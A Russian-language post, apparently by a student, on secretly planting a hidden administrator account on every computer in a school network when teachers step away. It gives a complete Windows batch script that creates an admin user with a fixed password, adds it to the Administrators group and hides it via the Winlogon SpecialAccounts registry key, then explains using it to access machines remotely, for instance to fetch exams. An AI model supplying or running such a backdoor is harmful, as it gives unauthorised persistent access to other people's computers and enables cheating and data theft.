Всем привет! Недавно появилась идея, а точнее нужда, взломать все компьютеры в локальной сети лицея. Учителя у нас не ахти, и иногда оставляют компьютер без присмотра на одну-две минуты. Ах да, и пароль они меняют где-то раз в месяц. Иногда бывали случаи, когда нужен был доступ к какому-то компьютеру, а наш пароль никак не подходил(ну там экзамен скачать). Тогда мы решили создать скрытую учетную запись администратора на каждом компьютере.
Вся соль была в том, чтобы сделать это за пару кликов. В этом нам помогут bat-файлы.
|
1
2
3
4
5
6
7
8
9
10
11
12
13
|
@echo offnet user adm mad /addSet AdmGroupSID=S-1-5-32-544Set AdmGroup=For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do Set AdmGroup=%%JSet AdmGroup=%AdmGroup:~0,-1%net localgroup %AdmGroup% /add admREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /fREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v adm /t REG_DWORD /d 0 /f |
Этот скрипт создает скрытого администратора с именем «adm» и паролем «mad».
(Можете просто поменять в коде их на свои)
Разберем наш код:
1)
|
1
2
3
|
@echo offnet user adm mad /add |
здесь мы создаем пользователя, совсем еще обычного, не администратора.
2)
|
1
2
3
4
|
Set AdmGroupSID=S-1-5-32-544Set AdmGroup=For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do Set AdmGroup=%%JSet AdmGroup=%AdmGroup:~0,-1% |
теперь нам нужно узнать имя локальной группы администраторов и записать ее в переменную, чтобы позже добавить туда нашего новоиспеченного юзера.
3)
|
1
|
net localgroup %AdmGroup% /add adm |
после добавления этой строчки наш юзер становится полноценным администратором системы.
4)
|
1
2
|
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /fREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v adm /t REG_DWORD /d 0 /f |
теперь нужно добавить записи в реестр, чтобы нашего юзера никто не видел.
Теперь мы можем создать невидимого администратора на любом компьютере всего за два клика.
Но как нам получить к нему доступ?
Ответ прост- по локальной сети. Объясняю:
1) Узнать айпи компьютера-жертвы на котором вы создали учетку админа. Для этого читайте статью
2) Теперь уже на любом подключенном к вашей локальной сети компьютере нажмите «Win+R» (запустить «Выполнить»)
3)Потом пишите \\ip адрес компьютера, к примеру \\192.168.0.23 и жмете Enter))
4) Вас просит ввести логин и пароль, тут мы и вводим наш логин и пароль, которые вы указали при создании пользователя. Все, теперь у вас есть доступ к этому компьютеру.
